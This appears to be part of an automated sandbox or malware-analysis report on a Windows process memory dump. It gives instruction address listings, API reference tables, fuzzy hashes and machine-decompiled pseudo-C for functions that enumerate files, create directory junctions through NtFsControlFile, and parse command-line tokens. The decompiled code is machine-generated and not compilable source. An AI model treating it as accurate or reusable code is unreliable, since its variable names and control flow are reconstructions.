                                  0x00170524
                                  0x00170524
                                  0x00170526
                                  0x00170528
                                  0x00170571
                                  0x00170571
                                  0x00170573
                                  0x00170575
                                  0x00170575
                                  0x00170583
                                  0x00170588
                                  0x0017058b
                                  0x0017058b
                                  0x00170592
                                  0x00170593
                                  0x00170598
                                  0x0017059d
                                  0x0017059f
                                  0x001705a1
                                  0x001705a1
                                  0x001705a9
                                  0x001705b5
                                  0x00000000
                                  0x001705b5
                                  0x0017052a
                                  0x0017052c
                                  0x0017052e
                                  0x0017052e
                                  0x00170534
                                  0x00170536
                                  0x0017053a
                                  0x00170540
                                  0x00170543
                                  0x00170543
                                  0x00170546
                                  0x00170549
                                  0x00170549
                                  0x00170550
                                  0x00170555
                                  0x0017055b
                                  0x00170560
                                  0x001705c3
                                  0x001705c8
                                  0x001705cb
                                  0x001705cd
                                  0x001705cf
                                  0x001705cf
                                  0x001705dd
                                  0x001705e2
                                  0x001705e5
                                  0x001705e8
                                  0x001705ea
                                  0x001705ec
                                  0x001705ec
                                  0x001705f4
                                  0x001705ff
                                  0x00170605
                                  0x00000000
                                  0x00170605
                                  0x00170569
                                  0x0017056e
                                  0x00000000
                                  0x0017056e
                                  0x001587a2
                                  0x001587a4
                                  0x001587a9
                                  0x001587af
                                  0x001587b0
                                  0x001587b0
                                  0x001587b6
                                  0x00000000
                                  0x00000000
                                  0x001587bf
                                  0x001587d8
                                  0x001587d8
                                  0x001587da
                                  0x001587dc
                                  0x0015881a
                                  0x0015882f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015882f
                                  0x001587de
                                  0x001587e3
                                  0x001587e9
                                  0x001587e9
                                  0x001587ef
                                  0x00000000
                                  0x00000000
                                  0x001587f4
                                  0x00158809
                                  0x00158809
                                  0x00158812
                                  0x00158814
                                  0x00170402
                                  0x00170405
                                  0x00170407
                                  0x00170409
                                  0x00170409
                                  0x0017040f
                                  0x00170415
                                  0x0017041a
                                  0x00170420
                                  0x00000000
                                  0x00170426
                                  0x00170426
                                  0x00170428
                                  0x00000000
                                  0x00000000
                                  0x0017042e
                                  0x00170434
                                  0x00170436
                                  0x0017043b
                                  0x00170449
                                  0x00170449
                                  0x0017044c
                                  0x0017044e
                                  0x00170450
                                  0x00170450
                                  0x0017045e
                                  0x00170463
                                  0x00170466
                                  0x0017046d
                                  0x0017046e
                                  0x00000000
                                  0x00170474
                                  0x0017043d
                                  0x00170443
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00170443
                                  0x00170420
                                  0x00000000
                                  0x00158814
                                  0x001587f6
                                  0x001587fa
                                  0x001587fe
                                  0x00000000
                                  0x00000000
                                  0x00158800
                                  0x00158802
                                  0x00158807
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00158807
                                  0x0015880d
                                  0x0015880f
                                  0x0015880f
                                  0x00000000
                                  0x0015880f
                                  0x001587c1
                                  0x001587c5
                                  0x001587c9
                                  0x00000000
                                  0x00000000
                                  0x001587cf
                                  0x001587d1
                                  0x001587d6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x001587d6
                                  0x00158876
                                  0x00158878
                                  0x00000000
                                  0x00158878
                                  0x0015879c
                                  0x00158752
                                  0x00158758
                                  0x0015875a
                                  0x0015875d
                                  0x0015875d
                                  0x00158760
                                  0x00158763
                                  0x0015876a
                                  0x00000000
                                  0x0015876a
                                  0x00158835
                                  0x00158835
                                  0x00000000
                                  0x00158835
                                  0x00158724
                                  0x001586b5

                                  APIs
                                  • memset.MSVCRT ref: 0015862C
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 00158691
                                  • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 001586A1
                                  • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,0015250C,?,?,?,-00000105), ref: 00158715
                                  • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 00158827
                                  • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 00158842
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0015885C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Find$File$CloseFirstmemset$Next
                                  • String ID: \\?\
                                  • API String ID: 3059144641-4282027825
                                  • Opcode ID: 65af4bad9416ca979936e55f26edadca456d648a752f1f05a9c16a8adb170287
                                  • Instruction ID: a814224ef185cfe2e47ea3b4f7f622362b09e6ca27dce587b7adec156d38648f
                                  • Opcode Fuzzy Hash: 65af4bad9416ca979936e55f26edadca456d648a752f1f05a9c16a8adb170287
                                  • Instruction Fuzzy Hash: B1D1E371A00219DBDF25DF68DC85BBE7378EF18301F4444A9E91AEB141EB319E89CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017B5E0, Relevance: 19.7, APIs: 13, Instructions: 180filememorynativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0017B5E0(void* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				void* _v48;
				void* _t60;
				void _t64;
				void* _t68;
				signed int _t77;
				void _t80;
				signed short _t81;
				long _t88;
				WCHAR* _t91;
				void* _t97;
				intOrPtr* _t102;
				void* _t104;
				void* _t109;
				void* _t111;
				long _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t115 = __ecx;
				_v40 = 0;
				_t114 = 1;
				_v16 = 0;
				_v36 = 0;
				_v24 = 0;
				_t91 = E0017B51A( *((intOrPtr*)(__ecx + 8)));
				_t116 = E0017B51A( *((intOrPtr*)(_t115 + 0xc)));
				if(_t91 == 0 || _t116 == 0) {
					L19:
					if(_v36 != 0) {
						RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
					}
					if(_t114 != 0 && _v24 != 0) {
						RemoveDirectoryW(_t91);
					}
					return _t114;
				} else {
					if(E0017B9D3(_t91, 0, 1) != 0) {
						if(E0017B91D(_t116) != 0) {
							if(CreateDirectoryW(_t91, 0) == 0) {
								goto L19;
							}
							_v24 = 1;
							_t60 = CreateFileW(_t91, 0x40000000, 1, 0, 3, 0x2000000, 0);
							_v20 = _t60;
							if(_t60 == 0xffffffff) {
								goto L19;
							}
							RtlDosPathNameToNtPathName_U(_t116,  &_v40, 0, 0);
							_t97 = _t116;
							_t10 = _t97 + 2; // 0x2
							_t109 = _t10;
							do {
								_t64 =  *_t97;
								_t97 = _t97 + 2;
							} while (_t64 != _v16);
							_v8 = (_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14;
							_t68 = E001600B0((_v40 & 0x0000ffff) + (_t97 - _t109 >> 1) * 2 + 0x14);
							_v12 = _t68;
							if(_t68 == 0) {
								_t117 = _v20;
								L18:
								CloseHandle(_t117);
								goto L19;
							}
							memset(_t68, 0, _v8);
							_t102 = _v12;
							 *((short*)(_t102 + 4)) = _v8 + 0xfffffff8;
							 *_t102 = 0xa0000003;
							 *((short*)(_t102 + 8)) = 0;
							 *((short*)(_t102 + 0xa)) = _v40;
							memcpy(_t102 + 0x10, _v36, _v40 & 0x0000ffff);
							_t111 = _v12;
							_t77 =  *(_t111 + 0xa) & 0x0000ffff;
							_v32 = _t77;
							_t104 = _t116;
							 *((short*)(_t111 + 0xc)) = _t77 + 2;
							_t31 = _t104 + 2; // 0x2
							_v28 = _t31;
							do {
								_t80 =  *_t104;
								_t104 = _t104 + 2;
							} while (_t80 != _v16);
							_t81 = (_t104 - _v28 >> 1) + (_t104 - _v28 >> 1);
							 *(_t111 + 0xe) = _t81;
							memcpy((_v32 & 0x0000ffff) + _t111 + 0x12, _t116, _t81 & 0x0000ffff);
							_t117 = _v20;
							_t88 = NtFsControlFile(_t117, 0, 0, 0,  &_v48, 0x900a4, _v12, _v8, 0, 0);
							if(_t88 >= 0) {
								_t114 = 0;
							} else {
								SetLastError(RtlNtStatusToDosError(_t88));
							}
							goto L18;
						}
						_push(0x40002749);
						L4:
						SetLastError();
						goto L19;
					}
					_push(0x4000272e);
					goto L4;
				}
			}






























                                  0x0017b5ea
                                  0x0017b5f1
                                  0x0017b5f4
                                  0x0017b5f5
                                  0x0017b5fb
                                  0x0017b5fe
                                  0x0017b609
                                  0x0017b610
                                  0x0017b614
                                  0x0017b7a2
                                  0x0017b7a6
                                  0x0017b7b7
                                  0x0017b7b7
                                  0x0017b7bf
                                  0x0017b7c8
                                  0x0017b7c8
                                  0x0017b7d6
                                  0x0017b622
                                  0x0017b62e
                                  0x0017b649
                                  0x0017b65e
                                  0x00000000
                                  0x00000000
                                  0x0017b666
                                  0x0017b679
                                  0x0017b67f
                                  0x0017b685
                                  0x00000000
                                  0x00000000
                                  0x0017b694
                                  0x0017b69a
                                  0x0017b69c
                                  0x0017b69c
                                  0x0017b69f
                                  0x0017b69f
                                  0x0017b6a2
                                  0x0017b6a5
                                  0x0017b6bb
                                  0x0017b6be
                                  0x0017b6c3
                                  0x0017b6c8
                                  0x0017b798
                                  0x0017b79b
                                  0x0017b79c
                                  0x00000000
                                  0x0017b79c
                                  0x0017b6d5
                                  0x0017b6da
                                  0x0017b6e6
                                  0x0017b6ef
                                  0x0017b6f5
                                  0x0017b6fd
                                  0x0017b70a
                                  0x0017b70f
                                  0x0017b715
                                  0x0017b71e
                                  0x0017b721
                                  0x0017b723
                                  0x0017b727
                                  0x0017b72a
                                  0x0017b72d
                                  0x0017b72d
                                  0x0017b730
                                  0x0017b733
                                  0x0017b73e
                                  0x0017b741
                                  0x0017b756
                                  0x0017b75e
                                  0x0017b778
                                  0x0017b780
                                  0x0017b794
                                  0x0017b782
                                  0x0017b78a
                                  0x0017b78a
                                  0x00000000
                                  0x0017b780
                                  0x0017b64b
                                  0x0017b635
                                  0x0017b635
                                  0x00000000
                                  0x0017b635
                                  0x0017b630
                                  0x00000000
                                  0x0017b630

                                  APIs
                                    • Part of subcall function 0017B51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 0017B533
                                    • Part of subcall function 0017B51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 0017B54F
                                    • Part of subcall function 0017B51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 0017B560
                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 0017B635
                                  • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 0017B656
                                  • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 0017B679
                                  • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0017B694
                                  • memset.MSVCRT ref: 0017B6D5
                                  • memcpy.MSVCRT ref: 0017B70A
                                  • memcpy.MSVCRT ref: 0017B756
                                  • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 0017B778
                                  • RtlNtStatusToDosError.NTDLL ref: 0017B783
                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0017B78A
                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0017B79C
                                  • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 0017B7B7
                                  • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0017B7C8
                                    • Part of subcall function 0017B9D3: memset.MSVCRT ref: 0017BA0F
                                    • Part of subcall function 0017B9D3: memset.MSVCRT ref: 0017BA37
                                    • Part of subcall function 0017B9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0017BAA8
                                    • Part of subcall function 0017B9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0017BAC7
                                    • Part of subcall function 0017B9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0017BB0B
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                  • String ID:
                                  • API String ID: 223857506-0
                                  • Opcode ID: b41940c991b3c434a29843456e288d4ad292a3e8fb86c8dce3c4f1d7b40e629c
                                  • Instruction ID: c1fd4c6e240db746b54211840e89255eda400f6bd375dce821fc6a3b27bec802
                                  • Opcode Fuzzy Hash: b41940c991b3c434a29843456e288d4ad292a3e8fb86c8dce3c4f1d7b40e629c
                                  • Instruction Fuzzy Hash: 68519F71904205ABDB159FB8CC85BBEB7B8EF88304B14856EF91AE7250E7359E41C760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015E040, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 289COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E0015E040(long __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				signed int _v549;
				long _v556;
				long _v560;
				signed int _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t81;
				int _t85;
				void* _t89;
				WCHAR* _t90;
				signed char _t91;
				intOrPtr _t92;
				intOrPtr _t96;
				long _t104;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t110;
				int _t111;
				signed char _t113;
				void* _t114;
				intOrPtr _t116;
				signed int _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t129;
				long _t130;
				intOrPtr* _t131;
				signed int _t133;
				intOrPtr* _t134;
				long _t136;
				void* _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				long _t150;
				long _t151;
				signed int _t152;
				void* _t153;
				void* _t154;

				_t143 = __edx;
				_t81 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t81 ^ _t152;
				_v560 = __edx;
				_t150 = __ecx;
				_v549 = 0;
				_v556 = __ecx;
				_t122 = _t121 | 0xffffffff;
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t154 = _t153 + 0xc;
				if(_v24 == 0) {
					_t85 = 0x104;
				} else {
					_t85 = 0x7fe7;
				}
				_t124 =  &_v548;
				if(E00160C70(_t124, _t85) < 0) {
					_t147 = 0xfffffffe;
					goto L31;
				} else {
					_t148 = 0;
					while(_t148 < 0x7fe6) {
						_t150 =  *( *((intOrPtr*)(_t150 + 0x38)) + _t148 * 2) & 0x0000ffff;
						_t116 = 0;
						if(_t150 == 0x22) {
							_t117 = _v549;
							_t124 = _t124 & 0xffffff00 | _t117 == 0x00000000;
							_v549 = _t124;
							if(_t117 == 0) {
								_t116 = 0;
							} else {
								_t116 = 1;
							}
							L8:
							if(_t124 != 0 || _t116 != 0) {
								L11:
								if(_t122 != 0xffffffff) {
									L13:
									_t118 = _v28;
									if(_t118 == 0) {
										_t118 =  &_v548;
									}
									 *(_t118 + _t148 * 2) = _t150;
									_t148 = _t148 + 1;
									_t150 = _v556;
									continue;
								}
								_t119 = wcschr(L":.\\", _t150);
								_t154 = _t154 + 8;
								if(_t119 != 0) {
									if( *0x193cc9 == 0) {
										break;
									}
									_t122 = _t148;
								}
								goto L13;
							} else {
								_t120 = wcschr(L"=,;+/[] \t\"", _t150);
								_t154 = _t154 + 8;
								if(_t120 != 0) {
									break;
								}
								goto L11;
							}
						}
						if(_t150 == 0) {
							break;
						}
						_t124 = _v549;
						goto L8;
					}
					_v564 = _t148;
					if(_t148 == 0) {
						_t147 = _t148 | 0xffffffff;
						L31:
						__imp__??_V@YAXPAX@Z();
						return E00166FD0(_t147, _t122, _v8 ^ _t152, _t143, _t147, _t150, _v28);
					}
					_t89 = _v28;
					if(_t89 == 0) {
						_t89 =  &_v548;
					}
					 *((short*)(_t89 + _t148 * 2)) = 0;
					if(_t122 != 0xffffffff) {
						_t90 = _v28;
						if(_t90 == 0) {
							_t90 =  &_v548;
						}
						_t91 = GetFileAttributesW(_t90);
						if(_t91 != 0xffffffff) {
							if((_t91 & 0x00000010) == 0) {
								goto L18;
							}
							goto L54;
						} else {
							L54:
							_t114 = _v28;
							_v564 = _t122;
							if(_t114 == 0) {
								_t114 =  &_v548;
							}
							 *((short*)(_t114 + _t122 * 2)) = 0;
							goto L18;
						}
					} else {
						L18:
						_t122 = _v28;
						if(_t122 == 0) {
							_t122 =  &_v548;
						}
						_t149 = 0;
						_t150 = 0x151628;
						do {
							_t24 = _t150 - 8; // 0x1535b0
							_t92 =  *_t24;
							if(_t92 == 0) {
								goto L22;
							}
							__imp___wcsicmp(_t122, _t92);
							_t154 = _t154 + 8;
							if(_t92 == 0) {
								_t113 =  *_t150 & 0x0000ffff;
								if((_t113 & 0x00000004) != 0) {
									if( *0x193cc9 != 0) {
										goto L25;
									}
									goto L22;
								}
								L25:
								_t128 = _v560;
								 *_v560 = _t113;
								L26:
								 *0x17d0dc = _t149;
								if(_t149 == 0xffffffff) {
									if(_v28 == 0) {
										_t143 =  &_v548;
									}
									_t129 = 0x2d;
									if(E0015DFC0(0x2d, _t143, _t128) == 0x2d) {
										_t147 = 0x2d;
									} else {
										_v549 = 0;
										_t122 = 0;
										while(1) {
											_t150 =  *( *((intOrPtr*)(_v556 + 0x38)) + _t122 * 2) & 0x0000ffff;
											if(_t150 == 0) {
												break;
											}
											_t109 = 0;
											if(_t150 == 0x22) {
												_t110 = _v549;
												_t129 = _t129 & 0xffffff00 | _t110 == 0x00000000;
												_v549 = _t129;
												if(_t110 == 0) {
													_t109 = 0;
												} else {
													_t109 = 1;
												}
											} else {
												_t129 = _v549;
											}
											if(_t129 == 0) {
												if(_t109 != 0) {
													goto L42;
												}
												_t111 = iswspace(_t150);
												_t154 = _t154 + 4;
												if(_t111 != 0) {
													break;
												}
												_t129 = L"=,;";
												if(E0015D7D4(_t129, _t150) != 0 || _t150 == 0x2f) {
													break;
												} else {
													goto L42;
												}
											} else {
												L42:
												_t122 = _t122 + 1;
												continue;
											}
										}
										_t130 = _v556;
										L28:
										_t131 =  *((intOrPtr*)(_t130 + 0x38));
										_t32 = _t131 + 2; // 0x2
										_t143 = _t32;
										do {
											_t96 =  *_t131;
											_t131 = _t131 + 2;
										} while (_t96 != 0);
										_t133 = _t131 - _t143 >> 1;
										if(_t122 != _t133) {
											_t66 = _t133 + 1; // -1
											_t151 = _t66;
											_t134 =  *((intOrPtr*)(_v556 + 0x3c));
											if(_t134 == 0) {
												L76:
												_t136 = E001600B0(_t151 + _t151);
												_v560 = _t136;
												if(_t136 == 0) {
													E00179287(_t136);
													__imp__longjmp(0x18b8b8, 1);
												}
												_t122 = _t122 + _t122;
												_t143 = _t151;
												E00161040(_t136, _t151,  *((intOrPtr*)(_v556 + 0x38)) + _t122);
												_t103 =  *((intOrPtr*)(_v556 + 0x3c));
												if( *((intOrPtr*)(_v556 + 0x3c)) == 0) {
													_t150 = _v560;
												} else {
													_t143 = _t151;
													_t150 = _v560;
													E001618C0(_t150, _t151, _t103);
												}
												_t104 = _v556;
												 *(_t104 + 0x3c) = _t150;
												 *((short*)(_t122 +  *((intOrPtr*)(_t104 + 0x38)))) = 0;
												goto L31;
											}
											_t145 = _t134 + 2;
											do {
												_t108 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t108 != 0);
											_t151 = _t151 + (_t134 - _t145 >> 1);
											goto L76;
										}
									}
									goto L31;
								}
								_t130 = _v556;
								_t122 = _v564;
								if(_t149 == 0x14) {
									 *((intOrPtr*)(_t130 + 0x40)) = 1;
								}
								goto L28;
							}
							L22:
							_t150 = _t150 + 0x18;
							_t149 = _t149 + 1;
						} while (_t150 <= 0x151a18);
						_t128 = _v560;
						_t149 = _t149 | 0xffffffff;
						goto L26;
					}
				}
			}




















































                                  0x0015e040
                                  0x0015e04b
                                  0x0015e052
                                  0x0015e063
                                  0x0015e069
                                  0x0015e06b
                                  0x0015e075
                                  0x0015e07b
                                  0x0015e07e
                                  0x0015e085
                                  0x0015e089
                                  0x0015e090
                                  0x0015e095
                                  0x0015e09c
                                  0x0016bd1d
                                  0x0015e0a2
                                  0x0015e0a2
                                  0x0015e0a2
                                  0x0015e0a8
                                  0x0015e0b5
                                  0x0016bd27
                                  0x00000000
                                  0x0015e0bb
                                  0x0015e0bb
                                  0x0015e0c0
                                  0x0015e0cb
                                  0x0015e0cf
                                  0x0015e0d4
                                  0x0015e212
                                  0x0015e21a
                                  0x0015e21d
                                  0x0015e225
                                  0x0015e310
                                  0x0015e22b
                                  0x0015e22b
                                  0x0015e22b
                                  0x0015e0e5
                                  0x0015e0e7
                                  0x0015e100
                                  0x0015e103
                                  0x0015e11c
                                  0x0015e11c
                                  0x0015e121
                                  0x0016bd31
                                  0x0016bd31
                                  0x0015e127
                                  0x0015e12b
                                  0x0015e12c
                                  0x00000000
                                  0x0015e12c
                                  0x0015e10b
                                  0x0015e111
                                  0x0015e116
                                  0x0015e2d8
                                  0x00000000
                                  0x00000000
                                  0x0015e2de
                                  0x0015e2de
                                  0x00000000
                                  0x0015e0ed
                                  0x0015e0f3
                                  0x0015e0f9
                                  0x0015e0fe
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015e0fe
                                  0x0015e0e7
                                  0x0015e0dd
                                  0x00000000
                                  0x00000000
                                  0x0015e0df
                                  0x00000000
                                  0x0015e0df
                                  0x0015e134
                                  0x0015e13c
                                  0x0016bd3c
                                  0x0015e1ea
                                  0x0015e1ed
                                  0x0015e208
                                  0x0015e208
                                  0x0015e142
                                  0x0015e147
                                  0x0016bd44
                                  0x0016bd44
                                  0x0015e14f
                                  0x0015e156
                                  0x0015e2e5
                                  0x0015e2ea
                                  0x0015e328
                                  0x0015e328
                                  0x0015e2ed
                                  0x0015e2f6
                                  0x0015e320
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015e2f8
                                  0x0015e2f8
                                  0x0015e2f8
                                  0x0015e2fb
                                  0x0015e303
                                  0x0015e330
                                  0x0015e330
                                  0x0015e307
                                  0x00000000
                                  0x0015e307
                                  0x0015e15c
                                  0x0015e15c
                                  0x0015e15c
                                  0x0015e161
                                  0x0016bd4f
                                  0x0016bd4f
                                  0x0015e167
                                  0x0015e169
                                  0x0015e170
                                  0x0015e170
                                  0x0015e170
                                  0x0015e175
                                  0x00000000
                                  0x00000000
                                  0x0015e179
                                  0x0015e17f
                                  0x0015e184
                                  0x0015e19d
                                  0x0015e1a2
                                  0x0016bd61
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016bd67
                                  0x0015e1a8
                                  0x0015e1a8
                                  0x0015e1ae
                                  0x0015e1b1
                                  0x0015e1b1
                                  0x0015e1ba
                                  0x0015e237
                                  0x0016bd6c
                                  0x0016bd6c
                                  0x0015e23e
                                  0x0015e24b
                                  0x0016bd77
                                  0x0015e251
                                  0x0015e251
                                  0x0015e258
                                  0x0015e260
                                  0x0015e269
                                  0x0015e270
                                  0x00000000
                                  0x00000000
                                  0x0015e272
                                  0x0015e277
                                  0x0015e2b8
                                  0x0015e2c0
                                  0x0015e2c3
                                  0x0015e2cb
                                  0x0015e317
                                  0x0015e2cd
                                  0x0015e2cd
                                  0x0015e2cd
                                  0x0015e279
                                  0x0015e279
                                  0x0015e279
                                  0x0015e281
                                  0x0015e288
                                  0x00000000
                                  0x00000000
                                  0x0015e28b
                                  0x0015e291
                                  0x0015e296
                                  0x00000000
                                  0x00000000
                                  0x0015e29a
                                  0x0015e2a6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015e283
                                  0x0015e283
                                  0x0015e283
                                  0x00000000
                                  0x0015e283
                                  0x0015e281
                                  0x0015e2ad
                                  0x0015e1cd
                                  0x0015e1cd
                                  0x0015e1d0
                                  0x0015e1d0
                                  0x0015e1d3
                                  0x0015e1d3
                                  0x0015e1d6
                                  0x0015e1d9
                                  0x0015e1e0
                                  0x0015e1e4
                                  0x0016bd87
                                  0x0016bd87
                                  0x0016bd8a
                                  0x0016bd8f
                                  0x0016bda5
                                  0x0016bdad
                                  0x0016bdaf
                                  0x0016bdb7
                                  0x0016bdb9
                                  0x0016bdc5
                                  0x0016bdc5
                                  0x0016bdd1
                                  0x0016bdd3
                                  0x0016bddb
                                  0x0016bde6
                                  0x0016bdeb
                                  0x0016bdff
                                  0x0016bded
                                  0x0016bded
                                  0x0016bdef
                                  0x0016bdf8
                                  0x0016bdf8
                                  0x0016be05
                                  0x0016be0d
                                  0x0016be13
                                  0x00000000
                                  0x0016be13
                                  0x0016bd91
                                  0x0016bd94
                                  0x0016bd94
                                  0x0016bd97
                                  0x0016bd9a
                                  0x0016bda3
                                  0x00000000
                                  0x0016bda3
                                  0x0015e1e4
                                  0x00000000
                                  0x0015e24b
                                  0x0015e1bc
                                  0x0015e1c2
                                  0x0015e1cb
                                  0x0015e209
                                  0x0015e209
                                  0x00000000
                                  0x0015e1cb
                                  0x0015e186
                                  0x0015e186
                                  0x0015e189
                                  0x0015e18a
                                  0x0015e192
                                  0x0015e198
                                  0x00000000
                                  0x0015e198
                                  0x0015e156

                                  APIs
                                  • memset.MSVCRT ref: 0015E090
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • wcschr.MSVCRT ref: 0015E0F3
                                  • wcschr.MSVCRT ref: 0015E10B
                                  • _wcsicmp.MSVCRT ref: 0015E179
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0015E1ED
                                  • iswspace.MSVCRT ref: 0015E28B
                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 0015E2ED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
                                  • String ID: :.\$=,;$=,;+/[] "
                                  • API String ID: 313872294-843887632
                                  • Opcode ID: 9bf5bcde5a14c97c33801608a1eec511491f24f1e592aa03e948b8b53d949e9a
                                  • Instruction ID: 33edaeecdda1c228663ea2f7dc55f7b4bec364cf4790093878193e41d2bb6378
                                  • Opcode Fuzzy Hash: 9bf5bcde5a14c97c33801608a1eec511491f24f1e592aa03e948b8b53d949e9a
                                  • Instruction Fuzzy Hash: 53A1DE31E08214DBCB288BA8DCC4BBA77E5AF55315F150199EC26AF291DB709E89CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015B89C, Relevance: 18.3, APIs: 12, Instructions: 257COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 52%
                                  			E0015B89C(WCHAR* __ecx, short* __edx, signed int _a4) {
				signed int _v12;
				int _v24;
				char _v28;
				void* _v32;
				void _v552;
				struct _WIN32_FIND_DATAW _v1144;
				int _v1148;
				signed int _v1152;
				void* _v1156;
				char _v1160;
				intOrPtr _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t71;
				intOrPtr _t74;
				void* _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				signed char _t80;
				short _t83;
				short _t84;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t110;
				signed int _t116;
				WCHAR* _t119;
				intOrPtr* _t124;
				WCHAR* _t129;
				signed int _t131;
				intOrPtr* _t134;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t140;
				signed int _t144;
				short* _t146;
				void* _t148;
				short* _t150;
				void* _t151;
				int _t154;
				intOrPtr* _t155;
				void* _t159;
				signed int _t160;
				void* _t161;

				_t145 = __edx;
				_t71 =  *0x17d0b4; // 0x3dd0c51d
				_v12 = _t71 ^ _t160;
				_t119 = __ecx;
				_v1152 = _a4;
				_t155 = __ecx;
				_v1148 = 0;
				_t150 =  &(__ecx[1]);
				do {
					_t74 =  *_t155;
					_t155 = _t155 + 2;
				} while (_t74 != 0);
				_t157 = _t155 - _t150 >> 1;
				if((_t155 - _t150 >> 1) + 2 > __edx) {
					L10:
					_t76 = 0;
					L8:
					_pop(_t151);
					return E00166FD0(_t76, _t119, _v12 ^ _t160, _t145, _t151, _t157);
				}
				_t124 = __ecx;
